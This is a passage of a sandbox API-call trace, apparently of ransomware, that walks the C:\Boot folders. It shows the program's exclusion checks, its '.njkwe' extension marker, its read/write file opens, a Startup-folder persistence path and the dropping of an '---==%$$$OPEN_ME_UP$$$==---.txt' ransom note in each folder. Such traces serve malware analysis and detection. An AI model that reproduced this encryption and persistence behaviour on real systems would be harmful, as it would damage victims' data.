cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.194] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0065.194] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.194] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0065.194] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0065.194] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.194] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\qps-ploc\\bootmgr.exe.mui") returned 36 [0065.194] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.194] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.194] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0065.194] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\qps-ploc\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.194] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\qps-ploc\\bootmgr.exe.mui" (normalized: "c:\\boot\\qps-ploc\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.195] FindNextFileW (in: hFindFile=0xc19d20, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef684d85, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xfbd1a998, ftLastWriteTime.dwHighDateTime=0x1d2fa06, nFileSizeHigh=0x0, nFileSizeLow=0xd398, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0065.195] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Windows") returned -1 [0065.195] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.195] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="System Volume Information") returned -1 [0065.195] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files") returned -1 [0065.195] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.195] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\qps-ploc\\memtest.exe.mui") returned 36 [0065.195] StrStrIW (lpFirst="memtest.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.195] lstrcmpW (lpString1="memtest.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.195] lstrcmpW (lpString1="memtest.exe.mui", lpString2="taridd") returned -1 [0065.195] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\qps-ploc\\memtest.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.195] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\qps-ploc\\memtest.exe.mui" (normalized: "c:\\boot\\qps-ploc\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.195] FindNextFileW (in: hFindFile=0xc19d20, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef684d85, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xfbd1a998, ftLastWriteTime.dwHighDateTime=0x1d2fa06, nFileSizeHigh=0x0, nFileSizeLow=0xd398, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0065.195] FindClose (in: hFindFile=0xc19d20 | out: hFindFile=0xc19d20) returned 1 [0065.196] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\qps-ploc\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 52 [0065.196] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\qps-ploc\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\qps-ploc\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.197] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0065.198] CloseHandle (hObject=0x428) returned 1 [0065.198] GetProcessHeap () returned 0xbe0000 [0065.198] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0065.198] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ab61e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9abff9, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Resources", cAlternateFileName="RESOUR~1")) returned 1 [0065.198] lstrcmpiW (lpString1="Resources", lpString2="Windows") returned -1 [0065.198] lstrcmpiW (lpString1="Resources", lpString2="$Recycle.bin") returned 1 [0065.198] lstrcmpiW (lpString1="Resources", lpString2="System Volume Information") returned -1 [0065.198] lstrcmpiW (lpString1="Resources", lpString2="Program Files") returned 1 [0065.198] lstrcmpiW (lpString1="Resources", lpString2="Program Files (x86)") returned 1 [0065.199] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Resources") returned 21 [0065.199] lstrcmpW (lpString1="Resources", lpString2=".") returned 1 [0065.199] lstrcmpW (lpString1="Resources", lpString2="..") returned 1 [0065.199] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\Resources", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0065.199] GetProcessHeap () returned 0xbe0000 [0065.199] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0065.199] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\Resources\\*") returned 23 [0065.199] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\Resources\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ab61e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9abff9, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a220 [0065.199] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.199] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.199] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.199] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.199] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.200] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Resources\\.") returned 23 [0065.200] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.200] FindNextFileW (in: hFindFile=0xc1a220, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ab61e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9abff9, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0065.200] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.200] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.200] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.200] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.200] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.200] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Resources\\..") returned 24 [0065.200] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.200] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.200] FindNextFileW (in: hFindFile=0xc1a220, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef9abff9, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef597530, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x169a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootres.dll", cAlternateFileName="")) returned 1 [0065.200] lstrcmpiW (lpString1="bootres.dll", lpString2="Windows") returned -1 [0065.200] lstrcmpiW (lpString1="bootres.dll", lpString2="$Recycle.bin") returned 1 [0065.200] lstrcmpiW (lpString1="bootres.dll", lpString2="System Volume Information") returned -1 [0065.200] lstrcmpiW (lpString1="bootres.dll", lpString2="Program Files") returned -1 [0065.200] lstrcmpiW (lpString1="bootres.dll", lpString2="Program Files (x86)") returned -1 [0065.200] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Resources\\bootres.dll") returned 33 [0065.200] StrStrIW (lpFirst="bootres.dll", lpSrch=".njkwe") returned 0x0 [0065.200] lstrcmpW (lpString1="bootres.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.200] lstrcmpW (lpString1="bootres.dll", lpString2="taridd") returned -1 [0065.200] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\Resources\\bootres.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.200] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Resources\\bootres.dll" (normalized: "c:\\boot\\resources\\bootres.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.200] FindNextFileW (in: hFindFile=0xc1a220, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ac01e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9baa67, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="en-US", cAlternateFileName="")) returned 1 [0065.200] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0065.200] lstrcmpiW (lpString1="en-US", lpString2="$Recycle.bin") returned 1 [0065.200] lstrcmpiW (lpString1="en-US", lpString2="System Volume Information") returned -1 [0065.200] lstrcmpiW (lpString1="en-US", lpString2="Program Files") returned -1 [0065.200] lstrcmpiW (lpString1="en-US", lpString2="Program Files (x86)") returned -1 [0065.200] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Resources\\en-US") returned 27 [0065.200] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0065.200] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0065.200] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\Resources\\en-US", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0065.201] GetProcessHeap () returned 0xbe0000 [0065.201] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0065.201] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\Resources\\en-US\\*") returned 29 [0065.201] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\Resources\\en-US\\*", lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ac01e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9baa67, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a0a0 [0065.201] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.201] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.201] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.201] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.201] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.201] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Resources\\en-US\\.") returned 29 [0065.201] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.201] FindNextFileW (in: hFindFile=0xc1a0a0, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ac01e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9baa67, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0065.201] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.201] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.201] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.201] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.201] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.201] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Resources\\en-US\\..") returned 30 [0065.201] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.201] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.201] FindNextFileW (in: hFindFile=0xc1a0a0, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef9baa67, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0x31acad58, ftLastWriteTime.dwHighDateTime=0x1d2a030, nFileSizeHigh=0x0, nFileSizeLow=0x2fa0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootres.dll.mui", cAlternateFileName="BOOTRE~1.MUI")) returned 1 [0065.201] lstrcmpiW (lpString1="bootres.dll.mui", lpString2="Windows") returned -1 [0065.201] lstrcmpiW (lpString1="bootres.dll.mui", lpString2="$Recycle.bin") returned 1 [0065.201] lstrcmpiW (lpString1="bootres.dll.mui", lpString2="System Volume Information") returned -1 [0065.201] lstrcmpiW (lpString1="bootres.dll.mui", lpString2="Program Files") returned -1 [0065.201] lstrcmpiW (lpString1="bootres.dll.mui", lpString2="Program Files (x86)") returned -1 [0065.201] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Resources\\en-US\\bootres.dll.mui") returned 43 [0065.201] StrStrIW (lpFirst="bootres.dll.mui", lpSrch=".njkwe") returned 0x0 [0065.201] lstrcmpW (lpString1="bootres.dll.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.202] lstrcmpW (lpString1="bootres.dll.mui", lpString2="taridd") returned -1 [0065.202] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\Resources\\en-US\\bootres.dll.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.202] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Resources\\en-US\\bootres.dll.mui" (normalized: "c:\\boot\\resources\\en-us\\bootres.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.202] FindNextFileW (in: hFindFile=0xc1a0a0, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef9baa67, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0x31acad58, ftLastWriteTime.dwHighDateTime=0x1d2a030, nFileSizeHigh=0x0, nFileSizeLow=0x2fa0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootres.dll.mui", cAlternateFileName="BOOTRE~1.MUI")) returned 0 [0065.202] FindClose (in: hFindFile=0xc1a0a0 | out: hFindFile=0xc1a0a0) returned 1 [0065.202] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Resources\\en-US\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 59 [0065.202] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Resources\\en-US\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\resources\\en-us\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0065.202] WriteFile (in: hFile=0x42c, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f564, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f564*=0x351, lpOverlapped=0x0) returned 1 [0065.203] CloseHandle (hObject=0x42c) returned 1 [0065.203] GetProcessHeap () returned 0xbe0000 [0065.203] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0065.203] FindNextFileW (in: hFindFile=0xc1a220, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ac01e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9baa67, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="en-US", cAlternateFileName="")) returned 0 [0065.203] FindClose (in: hFindFile=0xc1a220 | out: hFindFile=0xc1a220) returned 1 [0065.203] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Resources\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 53 [0065.203] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Resources\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\resources\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.204] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0065.205] CloseHandle (hObject=0x428) returned 1 [0065.205] GetProcessHeap () returned 0xbe0000 [0065.205] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0065.205] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4938cb0, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="ro-RO", cAlternateFileName="")) returned 1 [0065.205] lstrcmpiW (lpString1="ro-RO", lpString2="Windows") returned -1 [0065.205] lstrcmpiW (lpString1="ro-RO", lpString2="$Recycle.bin") returned 1 [0065.205] lstrcmpiW (lpString1="ro-RO", lpString2="System Volume Information") returned -1 [0065.205] lstrcmpiW (lpString1="ro-RO", lpString2="Program Files") returned 1 [0065.205] lstrcmpiW (lpString1="ro-RO", lpString2="Program Files (x86)") returned 1 [0065.205] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ro-RO") returned 17 [0065.205] lstrcmpW (lpString1="ro-RO", lpString2=".") returned 1 [0065.205] lstrcmpW (lpString1="ro-RO", lpString2="..") returned 1 [0065.205] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\ro-RO", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0065.205] GetProcessHeap () returned 0xbe0000 [0065.205] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0065.206] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\ro-RO\\*") returned 19 [0065.206] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ro-RO\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4938cb0, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a1e0 [0065.206] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.206] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.206] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.206] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.206] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.206] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ro-RO\\.") returned 19 [0065.206] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.206] FindNextFileW (in: hFindFile=0xc1a1e0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4938cb0, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0065.206] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.206] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.206] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.206] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.206] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.206] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ro-RO\\..") returned 20 [0065.206] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.206] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.206] FindNextFileW (in: hFindFile=0xc1a1e0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12960, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.206] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0065.206] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.206] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0065.206] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0065.206] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.206] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ro-RO\\bootmgr.exe.mui") returned 33 [0065.206] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.206] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.206] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0065.206] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\ro-RO\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.206] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ro-RO\\bootmgr.exe.mui" (normalized: "c:\\boot\\ro-ro\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.207] FindNextFileW (in: hFindFile=0xc1a1e0, lpFindFileData=0x380f820 | out: 